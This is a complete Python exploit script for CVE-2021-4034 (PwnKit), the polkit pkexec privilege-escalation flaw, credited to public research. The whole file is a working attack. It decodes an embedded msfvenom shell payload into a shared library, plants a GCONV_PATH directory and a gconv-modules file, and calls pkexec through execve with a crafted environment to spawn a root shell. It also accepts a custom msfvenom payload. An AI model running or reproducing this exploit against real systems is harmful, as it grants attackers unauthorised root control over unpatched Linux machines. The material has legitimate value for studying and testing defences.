#!/usr/bin/env python3
# CVE-2021-4034
# Original research done by Qualys https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
# Credits to (blasty and Joe Ammond) for their great work
# exploit code written by Ahmad Almorabea @almorabea

import base64
import os
import sys
import shutil
from ctypes import *
from ctypes.util import find_library

choise = input ("Do you want to choose a custom payload? y/n (n use default payload)  ")

if choise ==  'y':
	cPayload = input("please choose the payload in base64 from msfvenom  ")
	temp = open(cPayload, "r")
	payload_byte_msfvenom = temp.read()
	print(payload_byte_msfvenom)

else:
#msfvenom linux/x64/exec payload
	payload_byte_msfvenom = b'''
	f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
	AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ
	AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
	AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
	AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
	AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
	AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=
	'''
payload64 = base64.b64decode(payload_byte_msfvenom)

# altered environment variable to pass it to execve()
environ = [
        b'exploit',
        b'PATH=GCONV_PATH=.',
        b'LC_MESSAGES=en_US.UTF-8',
        b'XAUTHORITY=../exploitedWithLove',
        None
]

print("[+] Cleaning pervious exploiting attempt (if exist)")
if os.path.exists("payload.so"):
    os.remove("payload.so")
if os.path.exists("exploit"):
	shutil.rmtree("exploit")
if os.path.exists("GCONV_PATH=."):
	shutil.rmtree("GCONV_PATH=.")


print('[+] Creating shared library for exploit code.')
try:
    with open('payload.so', 'wb') as f:
        f.write(payload64)
except:
    print('[!] Failed creating payload.so.')
    sys.exit()
os.chmod('payload.so', 755)

try:
    os.mkdir("GCONV_PATH=.")
    with open('GCONV_PATH=./exploit', 'wb') as f:
        f.write(b'')
except:
    print('[!] Failed creating exploit file')
    sys.exit()
os.chmod('GCONV_PATH=./exploit', 755)

try:
    os.mkdir('exploit')
except FileExistsError:
    print('[-] exploit directory already exists, continuing.')
except:
    print('[!] Failed making exploit directory.')
    sys.exit()


try:
    with open('exploit/gconv-modules', 'wb') as f:
        f.write(b'module  UTF-8//    INTERNAL    ../payload    2\n');
except:
    print('[!] Failed to create gconf-modules config file.')
    sys.exit()


environ_p = (c_char_p * len(environ))()
environ_p[:] = environ


try:
    print("[+] Finding a libc library to call execve")
    libc = CDLL(find_library('c'))
    print("[+] Found a library at " + str(libc))
except:
    print('[!] Failed to find the library ')
    sys.exit()

print('[+] Call execve() with chosen payload')
print('[+] Enjoy your root shell')
libc.execve(b'/usr/bin/pkexec', c_char_p(None), environ_p)